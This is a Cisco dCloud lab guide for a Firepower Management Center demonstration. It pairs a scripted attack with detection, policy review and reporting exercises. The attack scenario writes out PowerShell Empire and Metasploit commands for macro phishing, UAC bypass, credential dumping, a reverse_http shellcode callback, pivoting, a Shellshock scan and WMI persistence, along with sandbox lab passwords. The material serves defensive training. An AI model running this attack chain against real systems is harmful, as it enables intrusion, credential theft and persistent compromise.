Académique Documents
Professionnel Documents
Culture Documents
NOTE: The lab assumes an understanding of techniques used by attackers in the Attack Kill Chain.
Scenario 1: The Attackassume the role of an attacker, perform a realistic attack against the target organization, use phishing
with a malicious Excel to take control of a client on the inside of the network, and leverage the compromised client to attack
other systems on the inside.
Scenario 2: Getting Started with Firepower Management Centerbecome familiar with the Firepower Management Center
(FMC) in order to understand the overall structure of the FMC, including how FMC automatically discovers the network it is
protecting, the operating systems, the applications relevant vulnerabilities, and logged in users. This also focuses on a typical
NGFW policy, understanding the ability to create policies to control applications and to leverage user identity from Cisco
Identity Services Engine (ISE).
Scenario 3: Detection and Analysisinvestigate a reported attack (the one from Scenario 1) using Firepower Management
Center, looking at Indicators of Compromise (IoCs) and correlating events from IPS, Advanced Malware Protection (AMP),
and Security Intelligence to understand the attack and the impact.
Visit Cisco dCloud Help pages at https://dcloud-cms.cisco.com/help for more information and training materials.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 1 of 54
Cisco dCloud
Requirements
The table below outlines the requirements for this preconfigured demonstration.
Table 1. Requirements
Required Optional
Laptop Cisco AnyConnect
Topology
This content includes preconfigured users and components to illustrate the scripted scenarios and features of the solution. Most
components are fully configurable with predefined administrative user accounts. You can see the IP address and user account
credentials to use to access a component by clicking the component icon in the Topology menu of your active session and in the
scenario steps that require their use.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 2 of 54
Cisco dCloud
Evilkali1 and Evilkali2these are the systems that launch the attacks in Scenario 1.
Workstation A and Workstation Bthese are clients inside the target organization. These clients connect to their network via
VPN (AnyConnect). With this, we illustrate both how Firepower Management Center can get user identity from ISE, and how
FMC can put an offending endpoint in quarantine automatically.
The VPN Clientshave physical IP addresses (198.18.133.x) and virtual IP addresses for VPN (198.19.19.x). The student will
connect to the physical IP addresses when accessing these machines, but the addresses seen after VPN termination will be
198.19.19.x.
IoT Surveillance camerathis is the ultimate target of the attack in this scenario.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 3 of 54
Cisco dCloud
Get Started
BEFORE PRESENTING
Cisco dCloud strongly recommends that you perform the tasks in this document with an active session before presenting in front
of a live audience. This will allow you to become familiar with the structure of the document and content.
It may be necessary to schedule a new session after following this guide in order to reset the environment to its original
configuration.
Follow the steps to schedule a session of the content and configure your presentation environment.
1. Browse to dcloud.cisco.com, select the location closest to you, and log in with your Cisco.com credentials.
2. (Optional) Register and configure your router if this is the first time you will use the router with dCloud. [Show Me How]
5. Verify that the status of your session is Active in My Dashboard > My Sessions.
7. For best performance, connect to the Jumper with Cisco AnyConnect VPN [Show Me How] and the local RDP client on
your laptop [Show Me How]
NOTE: You can also connect to the workstation using the Cisco dCloud Remote Desktop client [Show Me How]. The dCloud
Remote Desktop client works best for accessing an active session with minimal interaction. However, many users experience
connection and performance issues with this method.
8. On the workstation, open Firefox and connect to the Firepower Management Center at https://fmc.
9. Test connectivity to Workstation A by clicking the icon on the desktop, and click Use another account to login with
Username: DCLOUD/mordiac and Password: C1sco12345. Click OK.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 4 of 54
Cisco dCloud
10. Repeat steps to test connectivity to Workstation B by clicking the icon on the desktop, and click Use another account to
login this time with Username: DCLOUD/scratchy and Password: C1sco12345. Click OK.
11. From Workstation A, test connectivity to the critical IoT device (which contains incredibly sensitive information) by opening
the Chrome Browser, and navigating to http://iot.dcloud.cisco.com.
13. Choose the machine, click Load, and then click Open. Log in using username root and password C1sco12345.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 5 of 54
Cisco dCloud
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 6 of 54
Cisco dCloud
There are two employees, Scratchy (CFO) and Mordiac (ITadmin) who are looking for new jobs (both just updated their
Linkedin Profiles).
Steps
1. From the workstation, open a SSH window and connect to evil2 (198.18.133.111). Logon with root/C1sco12345.
Figure 6. Log in
2. Attempt to get to the internal server iot.dcloud.cisco.com directly from the attacking machine. Scan it with nmap to see if it
has ports 80 or 443 open.
nmap P0 198.19.10.211 p 80,443
NOTE: The website www.nmap.org is a well-known tool for attackers and penetration testers that does scanning and much more.
3. From the result below it shows that the attacker cannot reach the machine directly (note the word filtered).
root@evilkali2:~# nmap -P0 198.19.10.211 -p 80,443
4. Since the attacker cannot access the target directly, an attempt will be made to compromise a client computer. Attacker has
prepared a number of Excels with malicious macros and tried to make sure it will bypass Antivirus.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 7 of 54
Cisco dCloud
5. On evil2, start Powershell Empire and wait for a nave end user to open the Excel.
root@evilkali2:~# cd /opt/Empire
root@evilkali2:/opt/Empire# ./empire
NOTE: Powershell Empire is a Post-Exploitation framework for Windows environments. Powershell Empire uses Powershell (a
built in scripting language in Windows) to do its work which can be very stealthy and difficult to detect. It is typically used at later
stages in the attack kill chain (privilege exploitation, Lateral Movement, Persistence) but in this lab we will also use it for the initial
exploitation.
7. Use Remote Desktop to access WorkstationA (login with DCLOUD\mordiac and password C1sco12345).
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 8 of 54
Cisco dCloud
8. Verify that AnyConnect VPN session is established by clicking on the arrow in bottom right corner. Click the AnyConnect
icon. If you are not connected, press the connect button.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 9 of 54
Cisco dCloud
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 10 of 54
Cisco dCloud
11. This displays a number of Excel files to download. Click the link Catjob2.xls and try to download it. It will fail, as this type of
known malware can be stopped immediately.
12. Click Job-Obscene-Salary.xls. This file is a Zero Day, and carefully coded to bypass defenses.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 11 of 54
Cisco dCloud
NOTE: You may be prompted to Enable Editing and Enable Content. These are security measures, and are designed to
discourage end users from running macros. However, using social engineering it is often possible to bypass this defense.
NOTE: Do NOT quit the Excel application until after this lab.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 12 of 54
Cisco dCloud
15. Return to the SSH console to evilkali2. The screen should now indicate that the Powershell Empire has got its first client.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 13 of 54
Cisco dCloud
16. That shows that the Excel file was malicious. Check if any of the AV vendors at Virustotal would have picked it up.
17. From WorkstationA, open a tab in the browser and navigate to http://virustotal.com to submit the file.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 14 of 54
Cisco dCloud
18. Submit the newly downloaded file. Your output should look like below. Most likely, very few (if any) AV vendors detected the
file as malicious.
19. On your Evilkali2 SSH console with Empire, go to agents mode and watch your agent. The name is random.
(Empire) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last
Seen
--------- ----------- ------------ --------- ------- ----- -----
---------------
XZ1D4KMFFBS2CPC1 198.19.30.38 WORKSTATIONA DCLOUD\mordiac powershell/2936 5/0.0 2016-
03-17 18:16:56
20. Change the name to something shorter, for example, the letter A.
NOTE: Use <tab> to complete command so you only have to type the first letter of the Agent Name.
(Empire: agents) > rename <name of agent as per above> A
NOTE: You can use <tab> and only type Interact plus the first letter of the agent (in picture above that would be interact X + tab).
(Empire: agents) > interact A
(Empire: A) >
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 15 of 54
Cisco dCloud
22. Verify that we can now control the machine, change directory, list files, steal files, upload files.
23. Empire has many different modules (written in powershell), some of which we will use during this lab. To show the control we
have right now use the module trollsploit/message. Once in a module you can see its configurable parameters by typing info.
(Empire: A) > usemodule trollsploit/message
(Empire: trollsploit/message) > info
.
Options:
Name Required Value Description
---- -------- ------- -----------
MsgText True Lost contact with the Message text to display.
Domain Controller.
Then run the module by typing run.
NOTE: This is not so stealthy, so a real attacker would not do this without a good reason (such as to show a message box that
prompts for username passwords to gather credentials).
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 16 of 54
Cisco dCloud
25. Next the attacker wants to elevate privileges to system privileges. This is very easy here since Mordiac was (foolishly)
logged in as administrator. So all that is needed here is to bypass Microsoft UAC (user access control), see
http://www.powershellempire.com/?page_id=380.
26. From evilkali2, type back to go back to interact with A, then bypassuac test (test is the name of the listener) and answer yes
to the warning that module is not opsec safe (meaning it touches harddisk, leaving traces that AV or defensive tools could
detect).
27. The output displays (the name of the agent will vary), meaning you will have a new agent connection but with higher
privileges.
29. Enter agents and note which session has an asterisk (*) in the username column.
(Empire: A) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last
Seen
--------- ----------- ------------ --------- ------- ----- -----
---------------
A 198.18.133.38 WORKSTATIONA DCLOUD\mordiac powershell/3484 5/0.0 2016-
03-28 19:28:26
MZK3MLW4PGPFZNU1 198.18.133.38 WORKSTATIONA *DCLOUD\mordiac powershell/2228 5/0.0 2016-
03-28 19:28:26
30. Rename the session with an asterisk to (for example) AA and interact with it.
NOTE: Remember you only need to type the first character(s) of agent name and then TAB.
(Empire: agents) > rename MZK3MLW4PGPFZNU1 AA
(Empire: agents) > interact AA
(Empire: AA) >
31. The attacker now has a session with system privileges, allowing the attacker all privileges on the local machine, which
includes modifying system files and dumping password hashes.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 17 of 54
Cisco dCloud
33. The output will look similar to the below, if you scroll up you will see password and password hashes.
NOTE: Remember the attackers objective: To break into the IOT device iot.dcloud.cisco.com at 198.19.10.211. In order to do so
he may need to add new tools to the toolbox.
NOTE: We are now going to move add control of the compromised client to another attack framework: metasploit. Whilst
Powershell Empire allows for very easy and stealthy post exploitation in a windows environment using the Powershell scripting
language, Metasploit can be used to attack any system regardless of operating system.
34. Keep the SSH window open to evil2, but start a new SSH session to evil2 (198.18.133.111) and logon with
root/C1sco12345.
35. Start metasploit console (msfconsole) with the script file multi.rc.
root@evilkali2:~# msfconsole -r multi.rc
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 18 of 54
Cisco dCloud
NOTE: We now have two SSH sessions to evil2. With the first of them we are running Powershell Empire, a formidable post
exploitation framework in windows environments. But in order to attack the Linux based IoT device we want to create an alternative
control channel to the Metsploit framework (our second SSH session).
37. From the first SSH session with Empire, while interacting with a session with system privileges, enter the following
commands. This creates an outgoing http command control session to your metasploit listener.
(Empire: AA) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > set Listener Meterpreter
(Empire: code_execution/invoke_shellcode) > set Payload reverse_http
(Empire: code_execution/invoke_shellcode) > run
38. Now watch your second SSH session (the one with Metasploit listening). The output should look similar to below, indicating
that we now control the compromised client from Metasploit framework.
39. In the second SSH session (with metasploit), create a route to allow the Metasploit framework to attack targets on the inside of
the network via the compromised client using meterpreter session 1.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 19 of 54
Cisco dCloud
NOTE: Understand how the attack is going via the compromised client, even though the IoT device is not reachable directly.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 20 of 54
Cisco dCloud
40. Finally we should attack the IOT device using the previous meterpreter session.
41. From the second SSH windows (with the meterpreter session), invoke a meterpreter resource script iot2.rc that will setup the
attack to scan for the Bash Shellshock vulnerability (CVE-2014-6271). Even though this vulnerability is from September 2014,
the attacker has some hope because IoT systems are often not patched regularly.
msf exploit(handler) > resource iot2.rc
[*] Processing iot2.rc for ERB directives.
resource (iot2.rc)> use auxiliary/scanner/http/apache_mod_cgi_bash_env
resource (iot2.rc)> set targeturi /cgi-bin/vulnerable.cgi
targeturi => /cgi-bin/vulnerable.cgi
NOTE: If successful, the exploit will execute the Unix ID command on the server, proving it is possible to execute arbitrary
commands on the IoT server (under the context of the www user).
In this case however it is not working (no user info returned) as per below. The reason for that (IPS block) will be clear in lab 3.
43. A reasonable next step for the attacker is to gain persistence, meaning creating a backdoor that would survive a reboot. From
the attackers perspective, preferably one that is not caught by any AntiVirus. Powershell Empire (our first SSH session) will
achieve this goal.
44. On our first SSH session with Powershell Empire, use the module persistence/elevated/wmi.
(Empire: AA) > usemodule persistence/elevated/wmi
(Empire: persistence/elevated/wmi) > set Listener test
(Empire: persistence/elevated/wmi) > run
[>] Module is not opsec safe, run? [y/N] y
(Empire: persistence/elevated/wmi) >
WMI persistence established using listener test with OnStartup WMI subsubscription trigger.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 21 of 54
Cisco dCloud
45. Reboot WorkstationA by typing the following command in the Windows start window.
shutdown t 0 r
NOTE: Be careful typing this. Do not forget r or the system will just shut down and not restart.
46. Wait 1-2 minutes and then login with remote desktop.
47. In 5 minutes, you will have a new connection from the machine.
Conclusion
The attacker wanted to attack the internal IoT server to control the video camera.
The attacker tried to attack the IoT server directly but it seemed to be blocked by the firewall.
The attacker then launched a phishing attack against a nave user on the inside, using a zero day malware package as an
excel Macro, taking control of the machine on the inside.
The attacker escalated privileges to that of system, and could dump usernames/passwords on the machine.
The attacker established persistence, so he will remain in the network even after a reboot.
The attacker then decided to go after the IoT server using the Bash Shellshock attack. This attack may have failedmaybe an
IPS blocked it, or the server was patched. You will find out in Scenario 3.
The attacker is still in the network and will seek new ways to attack. One of them may be successful.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 22 of 54
Cisco dCloud
Context Explorer, that Firepower learns about the network it is protecting, the hosts, their operating systems, the applications,
the vulnerabilities and the logged in users
How Firepowers knowledge about the network it is protecting can be used to automatically tune IPS rules
How FMC can get identity information from ISE or Active Directory
Steps
1. From the Workstation, open the Firefox browser and logon to fmc (https://fmc), using username: dcloud and password:
C1sco12345.
2. Select Analysis/Context Explorer and adjust the time period to the last day.
NOTE: Some of the sections may take a long time to load in this virtual setup. The reason for this is being investigated.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 23 of 54
Cisco dCloud
3. A key feature of Firepower Management Center (FMC) is that it keeps track of the operating systems and applications used by
each host on the internal network, as well as the logged in users and vulnerabilities. Scroll down to the section on Network
Information. As you can see, FMC has discovered different Operating Systems.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 24 of 54
Cisco dCloud
4. Scroll down to Application Protocol Information to examine what applications have been discovered.
NOTE: It is possible to pick any section in a pie-chart, or any staple in a bar and click it to be able to do further filtering or drilling
down into analysis (jumping to events). For hosts (ip addresses) it is also possible to view the host profile. Navigate to the network
information, find 198.19.19.38 (workstation-A) and select View Host Information
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 25 of 54
Cisco dCloud
5. Look at the Host Information. This section displays logged in users, Indicators of Compromise, Operating systems,
Applications, and Vulnerabilities for that particular host.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 26 of 54
Cisco dCloud
NOTE: Point out the exclamation mark (!) to the left on certain applications. This is because Firepower has detected a new
application that is not in the configured whitelist. This whitelist (that can be learned by inspecting traffic to and from a host) can be
used to detect when something changes in the network (such as a new application). This can be very useful in static environments
(medical technical networks, SCADA, some DMZs etc.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 27 of 54
Cisco dCloud
NOTE: The knowledge FMC has gained of the network: The hosts, The Operating Systems, the applications and vulnerabilities
can be used to automatically fine tune the IPS policies.
8. Select Policy -> Access Control -> Intrusion and edit the dCloud-IPS policy by clicking the pencil symbol.
9. Firepower recommends changes to the IPS configuration based on its knowledge of the network. Click View Recommended
Changes below to see what changes are recommended.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 28 of 54
Cisco dCloud
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 29 of 54
Cisco dCloud
10. There are more than 2100 IPS signatures, which Firepower recommends you to change (based on its knowledge of the
network). The advantages of tuning IPS ruleset are that you both gain performance but also reduce the risk of false positives.
12. To look at NGFW policies, select Policies->Access Control -> Access Control and click the pen symbol.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 30 of 54
Cisco dCloud
13. Examine the different options for the NGFW policy. It is possible to have different rules depending on Active Directory Group,
Application, URL category but also attributes from Cisco ISE. For each rule, it is possible to define different IPS policies or
policies for AMP and logging.
14. Try adding a new rule (or edit an existing rule) to examine the options for applications, URLs, Users and ISE attributes. You do
not have to create the rule and can cancel out after investigating what options are available.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 31 of 54
Cisco dCloud
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 32 of 54
Cisco dCloud
15. Examine the SSL decryption policies. Select Policies->Access->SSL and edit the Dcloud-SSL Policy.
NOTE: It may be desirable in many cases to control when to decrypt SSL for reasons of policy (law and compliance) or
performance.
It is possible to decrypt/not decrypt based on a number of criteria such as source ip address, destination ip address, user identity
(e.g do not decrypt HR traffic), destination URL category (e.g do not decrypt finance) and so on.
16. On WorkstationA, test the decryption policy by trying to download a malicious file again using https:// from WorkstationA
and Internet Explorer
17. Navigate to https://www.evilchi.com/Catjob3.xls. This download will not succeed since the Advanced Malware Protection
(AMP) will block this file.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 33 of 54
Cisco dCloud
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 34 of 54
Cisco dCloud
18. Examine Device configuration. Select Devices->Device Management and edit the device vFTD.
NOTE: With Firepower Threat Defense (FTD) software FMC can configure all features such as NAT, Routing (static routes, BGP,
OSPF), DHCP server settings etc. Please feel free to investigate the different options but do please avoid making changes.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 35 of 54
Cisco dCloud
Firepower makes it easy to identify hosts that are compromised, by collecting Indicators of Compromise (IOCs) per host. An IOC
is a reasonable suspicion that a host may be compromised and under the control of somebody else. It is also possible to quickly
understand the context of the host, Operating System, running applications, vulnerabilities, malware, logged in users, and
connections to and from this host.
Steps
1. From the workstation, log in to the Firepower Management Center with Firefox, using https://198.18.133.10 with Username:
dcloud and password: C1sco12345.
2. Select Analysis -> Context Explorer. This is a good starting point for the Security Analysts
NOTE: Look at the Indications of Compromise (IoCs). One host (198.19.19.38) has experienced many IoCs.
NOTE: FMC collects the Indicator of Compromises (IoCs) per host, making it easy for the Security Analyst to identify the hosts that
need attention now.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 36 of 54
Cisco dCloud
3. The host 192.19.19.38 has a couple of Indicators of Compromise. Have a further look at this host by right clicking the blue
bar in the Indications by Host section and choose View Host Information.
Figure 45.
4. The Host Information View should open in a different window (see below).
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 37 of 54
Cisco dCloud
NOTE: Learn more about the machine that may have been compromised.
FMC offers you contextual information about a potentially compromised machine, such as
What malware events (files that are malware) relate to this machine?
5. From Host Profile, check what users have been logged on to the machine.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 38 of 54
Cisco dCloud
NOTE: Quiz yourself on why is it important to understand that mordiac has been logged on to the machine?
Mordiac is a CFO, so he has access to critical financial reports that could be secret.
Mordiac is a domain admin, so compromising his credentials with something like mimikatz would put all the credentials in the whole
organization at jeopardy! (including CFOs and any future Presidents).
6. From the Host Profile, check what operating system the compromised machine is running.
7. From the Host Profile, we have Indicators of Compromise. Check what Malware events are associated with this host.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 39 of 54
Cisco dCloud
8. Click the red wheel icon to view the Network File Trajectory for this file.
NOTE: The file was allowed at first, since it was a zero day malware.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 40 of 54
Cisco dCloud
NOTE: Firepower AMP records all file transfers, without regard to assumed disposition (unknown, clean or malware) and is able to
change its mind later and tell you about it! This is called retrospection!
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 41 of 54
Cisco dCloud
10. Examine the Threat Score (Dynamic Analysis, or Sandboxing Result). In this case the file was convicted (deemed
malicious) because of Dynamic Analysis (sandboxing). You can get details of the dynamic analysis by clicking
the Threat Score symbol:
NOTE: The Dynamic Analysis Summary shows some clear indicators why this file (that was not caught by any AV at the time) is
clearly malicious
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 42 of 54
Cisco dCloud
NOTE: Once the cloud intelligence has identified the file as malicious it will be blocked immediately by any security appliance fed
by the TALOS intelligence feed (other Cisco NGFWs, Web Security Appliances, Email Security Appliances or AMP for endpoints).
11. Verify that the same file (Obscene-Salary.xls) is now blocked immediately.
12. Open your remote desktop connection to Workstation A (the one that was initially compromised).
13. Select the link for Download files and try to download it again. The file fails.
NOTE: Depending on browser the file may be partially downloaded, but it will no no longer be a threat.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 43 of 54
Cisco dCloud
NOTE: We can quickly see that, this is high priority, Impact 2 Alarm (host potentially vulnerable), the attack was blocked, the
attacker was the IP of WorkstationA, a client on the inside, the victim was the IOT device, the attack was a Bash CGI environment
variable injection (a.k.a Bash Shellshock).
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 44 of 54
Cisco dCloud
NOTE: This Intrusion event maps against the previous attack attempt against the IoT device
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 45 of 54
Cisco dCloud
NOTE: The host seems to be try communicating with a host in Singapore (SGP). This is however blocked by the NGFW.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 46 of 54
Cisco dCloud
Conclusion
We first examine the host information, which told us the operating systems, applications etc. It also told us that the user logged
on to the host at the time of the event was mordiac, a domain admin.
Investigating the malware events showed us that this host had received an Excel file from a server in China. This file was
retrospectively convicted, meaning at first it was unknown and had to be into the network. But at a later stage Firepower
changed the verdict to malware.
The dynamic analysis of this file would also tell us of the nature of the file, that it was a macro launching a powershell.
Complimentary analysis from Virustotal or Threatgrid would have shown that this was a zero-day malware.
We also learned that workstationA has been attacking the critical IOT server. This attack was however blocked by the IPS.
We also learned that workstationA is communicating to a known CnC in Singapore (though this traffic is blocked).
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 47 of 54
Cisco dCloud
Scenario 4. Reporting
In this scenario, we will focus on the FMC Dashboards and Reporting. FMC allows for very rich and customizable data analysis
and reporting. In the short time available we will only touch on this subject briefly.
Steps
1. From the Workstation, open the Firefox browser and logon to fmc (https://fmc), using username: dcloud and password:
C1sco12345.
NOTE: Note that there are many different predefined dashboards (Files, Security Intelligence and many more). Each dashboard
also has different tabs (for example, Network, Threat, Intrusion Events etc).
NOTE: The dashboards can be used both as a graphical overview, for on-demand or scheduled reporting but it is also possible to
use them to drill into analysis, just by clicking on any of the links in the widgets. For example, Clicking on the CnC link under the
Connections by Security Intelligence shows the details of Security Intelligence (Reputation based drops to CnC).
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 48 of 54
Cisco dCloud
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 49 of 54
Cisco dCloud
6. Copy the new dashboard from the Summary Dashboard we just examined. Name your new dashboard and click Create.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 50 of 54
Cisco dCloud
8. Select Custom Analysis. This very flexible widget will allow us to display data from any table with lots of customization.
9. Customize the new widget by first clicking top left corner, then adjusting first the Table (as an example, pick the correlation
events, then pick which field you want to display, or any search criteria.
NOTE: It is for example very easy to show users in quarantine, or users with high number of NXdomain responses etc, depending
on the correlation policy.
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 51 of 54
Cisco dCloud
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 52 of 54
Cisco dCloud
10. You can convert your (customized) dashboard into a Report template. Click Report Designer on the top right of Dashboard.
11. This bring you to the Report Template design, which starts with your current dashboard structure but where you can still
modify reports, adding text, logotype, changing between bar, pie-charts graphs etc.
12. When you have finished, click Save and Generate your report.
13. When generating the report, make sure to select HTML output (there is no PDF reader).
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 53 of 54
Cisco dCloud
Conclusion
2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 54 of 54